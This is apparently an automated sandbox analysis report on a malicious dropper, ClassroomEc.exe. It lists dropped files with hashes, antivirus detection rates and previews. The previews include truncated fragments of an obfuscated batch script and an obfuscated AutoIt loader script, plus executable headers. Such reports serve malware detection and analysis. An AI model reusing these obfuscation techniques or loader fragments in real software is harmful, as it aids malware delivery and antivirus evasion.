Preview:	..@8.P......G....x..u..8..3..x.....u.....3......M..........h..I.....I.....tBhd.L.V....I...t2...U.R.1j...h......`...P.u.....I..M...`...P......,...H..\|....D..t..@8.@......\|....D..t..@8.@..........V....I.........u}............M.Qh....j.W.P.....~....M.....s......U.RQ.P..u..}..E..u..P......QLj(..l...P.E.P..`.I..M...l...P......E...P.Q..O....e...M..Qh..J.W....x..u.M.QV...P.....V.Q..u...f.}...........M.Qh....j.W.P............M...........3.G;.u.3.RRR.U.R.....u(3.U.SSRSj.Q.P0.u..M..}....u...@.I..y....U.R.U.RQ.PH..t$.E.P...Q....H..\|....D..t..@8.x..g....E......uR.U.RP.Q..M..E.P.q...A.P..A.PQ..d.I..M....u.Q...R0.........u..M.......u...@.I.......U.R.u.P.Q..}.........E.P...Q..e..3..E.........u.........E..U.!u.RW..P.Q..}.........E..U.RWP...Q..E.U.RP...Q..U.R..B0.E.E.P...QL.M..3.U.9U.vU.E.U.R.U.R..P.Q ..u4.E..U.R.u..P.Q8.E..U.Rj.P...QH.E.;E.E.P.........Q..U.B.U.;U.r..E.P...Q.G;}...8....u...t...........}.........E..U.RP...Q..u.}..E..u..P......QLj(..l...P.E.P..`.I...te.E...u+.M...l...P.y.

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Avoid

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	ASCII text, with very long lines (1642), with CRLF line terminators
Category:	dropped
Size (bytes):	11538
Entropy (8bit):	5.808106027541853
Encrypted:	false
SSDEEP:	192:jwOy153hQUYdlwu3E9BvBb71OlMEVqjveQ6/lMjcEUo/arUuNOcS:cO4c/wNtYNXU
MD5:	1DBF38EAFA3409FD5304C40E59660BE9
SHA1:	E1DF1976D92E2F15CDF870291BEA8BAAEAD29304
SHA-256:	BDCEEFF01EBC601F183853AD92513F3D4FB25C21469EE7E9298408FE94EE258E
SHA-512:	D4F8BB33AAB8729954F5A87B5A884E48237E6A94A396CA323F874FAB9FC9D859ED15B29823F28C1B270259BC078421E33D0F6ACAAC3F734AE134C45296879F41
Malicious:	false
Preview:	Set CtYziAfyYJECwiwJNHeWttrRoCnEzBwTYapjVECu=z..CXdpbIgdunTacnqilFwLLvH=EJXOOoyWzxCyAZtPfrxDZGWL..NxXtRYydFFOKmB=zXYwVVGlAkcHwtLYMjDqNiRCcvPVx..yPCvlwHVPdulvTcs=jUHwnWBlkuc..muLQluFyFUJdRvjTDKYura=wMgGTqkYVkgdlczjMPjns..sleJHGAogCuDKr=AMtzVOtCyebpnksRUkPctElzEbMW..lHLddjriycvjHWGpbeXXLksU=RVCKOnwiQVcMToYgJPPzpb..DlicPZqYfRIndAbdXcyQqkb=TYJwvCBnxhYAHejiPWyUl..INjnRXrGHsNEBRfZBNdlteB=JVpXqryCalfVOYKDxNGHNeAxRQca..Set ZEFkdPWOyFDjlksBxkDrNPsvUpGxOylINXzFKKnoN=t..iecCRoTbFRfRphp=ipBqqcVnhSLRJMcf..BpxmGOkUHFRbupaAzsZkOgMiWfZbe=SvZTIrPQAxdyaPrwuIzdfcctl..bhDdOOSTNcnhAg=DQEVIVWrVodrLnbqVIvFBhpF..hmeICTotEMEQoBdBlIon=uxfxDErJpfGZzxvTxafiZuMS..MiytsEwiQuyMg=ftccvXROuTHPdTdLZHblQbYERLFSD..suyzZrELfUaXqkb=goRyibfroSuQDLaZkTCA..XThihaCSTvMifvvqbuUReli=NoECzLiJWSsfDYTtNlfcxJhgVYNM..JHMLdzyOZmifelbyibmhPr=UMBtUfHxYxwhlEDjENdNLousnQ..NBgmSFPSZPfln=tpUwXjBElUmmduLFl..Set tuTTJVpIcLDbfDRcGZkdBDHoszqagJuzEJuankmZRg=e..wMEWHVmMxTrAnKCfVQzLEpSGb=WcmjmjMSiEPtLzlxZLF..UOJptqVylRTYmoZrjoxQOF=XARyZBlliqREoMdo

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Avoid.bat (copy)

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (1642), with CRLF line terminators
Category:	dropped
Size (bytes):	11538
Entropy (8bit):	5.808106027541853
Encrypted:	false
SSDEEP:	192:jwOy153hQUYdlwu3E9BvBb71OlMEVqjveQ6/lMjcEUo/arUuNOcS:cO4c/wNtYNXU
MD5:	1DBF38EAFA3409FD5304C40E59660BE9
SHA1:	E1DF1976D92E2F15CDF870291BEA8BAAEAD29304
SHA-256:	BDCEEFF01EBC601F183853AD92513F3D4FB25C21469EE7E9298408FE94EE258E
SHA-512:	D4F8BB33AAB8729954F5A87B5A884E48237E6A94A396CA323F874FAB9FC9D859ED15B29823F28C1B270259BC078421E33D0F6ACAAC3F734AE134C45296879F41
Malicious:	false
Preview:	Set CtYziAfyYJECwiwJNHeWttrRoCnEzBwTYapjVECu=z..CXdpbIgdunTacnqilFwLLvH=EJXOOoyWzxCyAZtPfrxDZGWL..NxXtRYydFFOKmB=zXYwVVGlAkcHwtLYMjDqNiRCcvPVx..yPCvlwHVPdulvTcs=jUHwnWBlkuc..muLQluFyFUJdRvjTDKYura=wMgGTqkYVkgdlczjMPjns..sleJHGAogCuDKr=AMtzVOtCyebpnksRUkPctElzEbMW..lHLddjriycvjHWGpbeXXLksU=RVCKOnwiQVcMToYgJPPzpb..DlicPZqYfRIndAbdXcyQqkb=TYJwvCBnxhYAHejiPWyUl..INjnRXrGHsNEBRfZBNdlteB=JVpXqryCalfVOYKDxNGHNeAxRQca..Set ZEFkdPWOyFDjlksBxkDrNPsvUpGxOylINXzFKKnoN=t..iecCRoTbFRfRphp=ipBqqcVnhSLRJMcf..BpxmGOkUHFRbupaAzsZkOgMiWfZbe=SvZTIrPQAxdyaPrwuIzdfcctl..bhDdOOSTNcnhAg=DQEVIVWrVodrLnbqVIvFBhpF..hmeICTotEMEQoBdBlIon=uxfxDErJpfGZzxvTxafiZuMS..MiytsEwiQuyMg=ftccvXROuTHPdTdLZHblQbYERLFSD..suyzZrELfUaXqkb=goRyibfroSuQDLaZkTCA..XThihaCSTvMifvvqbuUReli=NoECzLiJWSsfDYTtNlfcxJhgVYNM..JHMLdzyOZmifelbyibmhPr=UMBtUfHxYxwhlEDjENdNLousnQ..NBgmSFPSZPfln=tpUwXjBElUmmduLFl..Set tuTTJVpIcLDbfDRcGZkdBDHoszqagJuzEJuankmZRg=e..wMEWHVmMxTrAnKCfVQzLEpSGb=WcmjmjMSiEPtLzlxZLF..UOJptqVylRTYmoZrjoxQOF=XARyZBlliqREoMdo

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Conf

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	ASCII text, with very long lines (2633), with CRLF line terminators
Category:	dropped
Size (bytes):	1213985
Entropy (8bit):	5.424802222912315
Encrypted:	false
SSDEEP:	12288:A96a/UwPRU7iuldXPKzUq0T1Ozd5Ux9BHtV7NdJK8crvosLhjNh4PfAv:pa/UwPRUvldXil01OAJHX/JK1LhB
MD5:	2755A48352BA322E4FB289CC432C2882
SHA1:	4F88077F28D532C45CFEC6A8320BCA36FCEBB773
SHA-256:	6718CA85EE272C4251160CB301D3D5C17A78864EB8DB7100F418A72D053F7A4B
SHA-512:	2D04052FA6582C48F17247A27E227253E4F8669421A1A1C086D4AAE267647B0402F8976C238E7390A9DBE42F15481E4714F3D34F88A9F00A5D77F096FA747737
Malicious:	false
Preview:	Func CryChambers($EXPENSECARRYING)..$experiencesboulderpara = 588..$WellingtonNelsonDisks = 93..While 927..If $experiencesboulderpara = 586 Then..$AccordanceProceedingsFatIntend = 'restorationgrastaobservedrecipientusesmentordozenclosedelectricitysynopsistransmitted'..ObjGet(restorationml("76U81U79U77U91U92U51U80U93U90U92U51U85U81U86U51",56/7))..$CarriedReform = 'PATMORTGAGESCOCKSGENETICSBOBBYNATURALBROWSERFACTMOTHERBOARDCAFELADDERINFLUENCED'..IsDeclared(restorationml("85U70U68U73U79U74U82U86U70U84U65",5/5))..$brochurewelsh = 'onsrepositorydiscussionsromance'..Ceiling(3634)..$AttributesProjectedRetrieved = 'BOUGHTNEIGHBORSSHAMECONSTRAINTSMAMBOCOMMEUROLAYOUTATTORNEYS'..Chr(6319)..$experiencesboulderpara = $experiencesboulderpara + 1..EndIf..If $experiencesboulderpara = 587 Then..$atmosphericfeweralbany = 'DANNYNUDEEXTERIORRESIDENCEMEDICATIONDFGARLICHOSPITALITYPERFORMINGDEALTIMESPEAKINGDISCRIMINATIONCUSTOMSTAGGED'..IsDeclared(restorationml("78U104U108U94U82U101U115U112U111U110U115U105U98

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Imaging

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	data
Category:	dropped
Size (bytes):	284672
Entropy (8bit):	6.7111298454087125
Encrypted:	false
SSDEEP:	6144:nwU0Wyw3mFygyE4mqd12lqlEAehuqN8zwNzlmhPL1b5nZ2tZ6lfA6d:nr0Wyw20K4mqClqlEZuB1b5Z2tZ6Xd
MD5:	EAD6F8DB6759E6E9E2F4B7708A96AC92
SHA1:	FFB1D6010A38D57F8B77C0CD0085FFA790C8AEDE
SHA-256:	87FBFECD918F36439ED5D682B4A221E15BE4612CDD02FD7E565946650968B908
SHA-512:	1693E94F7189097BE1EE1D42AB88402D12247E7B76BDCD842ADFD22C70A25AAEC4A82A715B82D4D8DC5BED43185CFD228D3C0E2A60CA51D787ED4F5F3425FF8B
Malicious:	false
Preview:	.M.W..<.I.....M.......u._..^.U..QSVW.}............M..0.E...t...........}.....J.h....j.S..p.I.....uP..0.I...Wu5j.ht.J.S..........t!j.h..J.S.........t.VVS..p.I.....3...u..M.........M......t.V....I...u....;}...V...3._^[.....U..E.W.<...M.......L.....3.....u.3..D..t....<V.u..u......YY..t..u.P....I.....t.V.5...Y......j..'...Y..3.^_].U..Vh..J.h..J.h..J.j..w..........t..u.......I...^].^].%..I.U..Vh..J.h..J.h..J.j..<.........u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............u..u...t.......I.........I.^].U..Vh..J.h..J.h..J.j............t..u....u..u.....I......u..u...8.I.^]...M....M.3.;.V.5..L........B.0.@.;.u.^.U..}..u'V...M..>.t..>.t..6....I..&........M.u.^]................SVW.T$..D$..L$.URPQQh.;B.d.5.......L.3.D$.d.%.....D$0.X..L$,3..p....t;.T$4...t.;.v..4v.\.....H..{..u.h.....C...........C......d........._^[.L$..A..........t3.D$..H.3..<...U.h..p..p..p..>......].D$..T$..........U.t$.........L$..).q..q..q(....

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Organ

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	data
Category:	dropped
Size (bytes):	142944
Entropy (8bit):	5.969459394945841
Encrypted:	false
SSDEEP:	3072:b6jKj+wsxjgarB3RZgDWy4ZNogXJ3i2Umb2Oq:b64EgarxUaBZ2myoG
MD5:	6B960EF62185ED62F077876EADCC43BA
SHA1:	43145A1CAD268EB3A9E83976220C1FEF520C9178
SHA-256:	AFA04BC5E7565DC55796122C222B1BF313A9EACCEE9950C47A7E3B0FE1E3E81A
SHA-512:	99F644DF6343D6C875F772C3131191BB9DBB43E7A4C8D8541CD6BAFAEA7E4BDA1C92CE598B3795779F426B055F87631331489620B6BDF454C4820A374D7A7069
Malicious:	false
Preview:	.................*.+.,.-......7.8.9.:......D.E.F.G......Q.R.S.T......^._.`.a......j.k.l.m...........................@...................`........................... ................... ...........@....................................................................... ...............................................................................................................................................\.P.{.N.d.}.....\.P.{.X.p.s.}...\.p.{.X.p.s.}.......................................................................................................................alpha.lower.upper.alnum.ascii.blank.cntrl.digit.graph.print.punct.space.word.xdigit.\.P.{.X.w.d.}...\.p.{.N.d.}.....................\.h.....\.P.{.L.}...\.p.{.L.}................MARK.ACCEPT.COMMIT.F.FAIL.PRUNE.SKIP.THEN..\.P.{.L.l.}...............................M.....=.%...N.+...f.5...\.;.....C.....L...].S.....[.....d.....j.....l.........B.....g................._.....C.........................................>...........

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Phd

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	data
Category:	dropped
Size (bytes):	112640
Entropy (8bit):	6.611164856526023
Encrypted:	false
SSDEEP:	3072:Ufza6iyY5tVGvH7fsUQwHJJX4xF5jtHk5B+LNBI:Ufm608DsvqJX4xNAB+g
MD5:	34BF8C86E3DBF86DCB7757C149E9F093
SHA1:	073875E0FF5BF3F02E4A7364771D285D4278B099
SHA-256:	B6D1D4992A081AC54315204C8F8E0A269582D0C8D58A05ECAE9A1FBEC9427358
SHA-512:	A3F157D609E776E3A2D9F5D50CFA699B89508F58ABA0775428C941067881FAC3E74FD8BF54D66368E8A83D841FC6184D9B682568496CD471ABDE45C44DFFC30A
Malicious:	false
Preview:	.v.....j.Xf.E...S.Nq..Y..E.P..p.I....v......._^..[....U..Vj...q.....E.Yf.8.u..H....H...t...Q.P....&...^]...U..E.SVW.X.S..`.I........;.~...AQ..p..Y...O.3.PPQVj.SPP....I._..^[]...U..QQVj..p...U...j..E.P.J..M..J.V.M.........^....U..VWj..hp..Y..W..l.I..u.VW....I...y..f...f...._^]...U..E.SVW.X.S..`.I.......;.~...3.@j.Z.........Q..p....Y..t.SW....I.3.f..w.._^[]...U..S.].V.u.W.}.S...W.E.....I...xWf...tLf.}..j.Yr.f...w......f;.t2f;.u.j..w......Vj.WW..D.I.j...Xf9.u.j..w........x.3.@..3._^[]...U..SVW.}.j....[f;.......j.ZjHYj.^f;.v.f;.vnf;.ti.]..u.SV..8.I...ypf...uj.{.V.....E...M...p.I.j.Xf;.t#j.Yf;.v.j.Yf;.v.jHYf;.t..E.f...G..%f...E.PW.......u.V..p.I.W.u.f...W....F._^[]...U...(S.] VW.}.f.?$..O....E.P..l.I..G..U.3.RV.u.u..VP.Q(.u.u..................G..U.3.WR..WWP.Q,.........}...@...E...E f..t/.u.j....X..f..R..p.I...f....f...E .@..D.......@.3.A+....E.E .@..E.3..E..........N.j..M..M.^.}......R....E ..p.I.....M....f.4......E.9E.u..u.!..E PQ.}..........E ...E..}..M.f.4P........

C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Producing

Download File

Process:	C:\Users\user\AppData\Roaming\ClassroomEc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	142336
Entropy (8bit):	6.406248037321785
Encrypted:	false
SSDEEP:	3072:pPpU08BjlWTPJth26X7Sn4UfpLUNN9t68cCWlrss4M5i9:LQBk7JjX74cN0lrzt4
MD5:	FD88002B2C4106D99DB3171C2F55B007
SHA1:	9E4FDC1C725805000ECDA278E02AE39B7C04E12E
SHA-256:	64E46C6062D2165105A22E023A92BD2F20C3751A6CE3CEE6053FBB33C9E05D40
SHA-512:	CBB8A2110FBDA84322D92FB15D6473333AD4DF43B780A0E76443509755291121893DF1A6F2B67E3C80AECBB6F5B6586B217CE8EEC5EDD3F4B92FEAD9298376FC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3% Antivirus: Virustotal, Detection: 1%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........;...h...h...h4;mh...h4;oh...h4;nh...h..[h...h..i...h..i...h..i...h...h...h...h...h...h...h..i..h..i...h..ch...h...h...h..i...hRich...h........PE..L......`.........."...............................@.................................!Z....@...@.......@.....................T...\|....P..h............L..`&...0..,v...........................C..........@............................................text............................... ..`.rdata..r...........................@..@.data...\|p.......H..................@....rsrc...h....P......................@..@.reloc..,v...0...x..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_knmsymfk.fga.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o32smafy.rp3.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qzvrfx0d.0wu.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wcotxug2.ikf.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wev0mvf4.kus.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypevna2a.nq5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\ClassroomEc.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212711
Entropy (8bit):	7.912999126781567
Encrypted:	false
SSDEEP:	24576:UAl76qnq2ZULeYTnZXHQJZW6xcZLPLaDWmcGiVPxccmvrJ4428ng:N9hx/gZIeZLPMWbGQsvq/H
MD5:	956D074F7C6BD174C43586F07892E820
SHA1:	45A9273A96E66B3B05D2B53540C1B4DC6C5E2A05
SHA-256:	BDF72E1C0964B7A7B96651B278B6F8D4B42849C01FF2AA6C6844B5AC2A893F3B
SHA-512:	ABB7C98BE2A86A543D353D0ED812FD87A0303BCC858F39A19DE7A3F20829C071BCDC3AFA99D9F82C0C8C9B3C8674D4C9CE2B73A43E0A760CA9BA1A659664BFE3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29% Antivirus: Virustotal, Detection: 49%, Browse
Preview:	MZ`.....................@...............................................!..L.!Require Windows..$....[a..[a..[a..R.~.Ya..R.o.\a..R.y.Ma..R.i.Ja..[a..a..4.d.Ya..4.P._a..4.Q.ja..4.`.Za..4.g.Za..Rich[a..................PE..L......`.................z...........{............@..........................p............@.................................T...........Q@..........?Y...'...P..8....................................................................................text....x.......z.................. ..`.rdata..j5.......6...~..............@..@.data....+..........................@....rsrc...Q@.......B..................@..@.reloc..`....P......................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CEU3YXO64H0Q3UD979V4.temp

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7053960929355827
Encrypted:	false
SSDEEP:	48:JJlV8AeCdbU2K+DMzukvhkvklCywln2eVGCeL7ci7SogZog+VGCeL7ci7SogZoU1:nldeCeofkvhkvCCtf0JLIHc0JLIHr
MD5:	EC0975773A12840F274A07B7A98B509D
SHA1:	5B148AADBD226554E43B9AB7E6906823EDCEC44C
SHA-256:	990FF13AF85568017D48EEC6E874C6F23B5EA2A109B9B05456F262FF05759402
SHA-512:	8350DAF4D59BB220A189C8A37CF6DE845B84986649B29259551F5A524328DB686B4C07DE5A4154D2291B01CE110936CD1B4DEBF43D37F824693B3FF39E4BBBA4
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......=[..d..!....d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlUX.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....UX.9..Roaming.@......DWSlUX.9....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlUX.9....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlUX.9....E........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlUX.9....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlUX.9....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	6222
Entropy (8bit):	3.7053960929355827
Encrypted:	false
SSDEEP:	48:JJlV8AeCdbU2K+DMzukvhkvklCywln2eVGCeL7ci7SogZog+VGCeL7ci7SogZoU1:nldeCeofkvhkvCCtf0JLIHc0JLIHr
MD5:	EC0975773A12840F274A07B7A98B509D
SHA1:	5B148AADBD226554E43B9AB7E6906823EDCEC44C
SHA-256:	990FF13AF85568017D48EEC6E874C6F23B5EA2A109B9B05456F262FF05759402
SHA-512:	8350DAF4D59BB220A189C8A37CF6DE845B84986649B29259551F5A524328DB686B4C07DE5A4154D2291B01CE110936CD1B4DEBF43D37F824693B3FF39E4BBBA4
Malicious:	false
Preview:	...................................FL..................F.".. ...d........s....z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M......=[..d..!....d......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSlUX.9....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....UX.9..Roaming.@......DWSlUX.9....C.........................R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSlUX.9....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSlUX.9....E........................W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSlUX.9....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSlUX.9....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSlDW.n....q...........

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.979164574485483
Encrypted:	false
SSDEEP:	48:8ndrTz36EHQZidAKZdA19ehwiZUklqehty+3:8J/6jay
MD5:	DEA6799FE712FD5D9A2BAF0FADBF8F82
SHA1:	7914F1342CB43CC5019DF1EC852F942B9E226E9C
SHA-256:	B0A0A876156366C30D6EA21E078B66BF52146E8045094D452D384A0BBBD09974
SHA-512:	323D34C478AC8E91CB32226F00BFCDCC7100AD491F8B58617EAD380C96E9E7622B43395175164A492F9C746392A781FA5F62184CE3F306F7DD2B45826E16B35F
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....[...d..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IUX.9....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VUX.9....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VUX.9....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VUX.9..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VUX.9...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............$Q......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Feb 21 06:14:06 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9940101891510538
Encrypted:	false
SSDEEP:	48:8+drTz36EHQZidAKZdA1weh/iZUkAQkqehKy+2:82/6R9QLy
MD5:	A3766AFDA1EC0B1F2193B4C8140E9048
SHA1:	BB695C14FE01BFB5923C15E6C2C3D474930E6DBE
SHA-256:	023C07DC3F23029E02D6F0E5853F430EA8EC42697FE90704949E46C6A63BD7F4
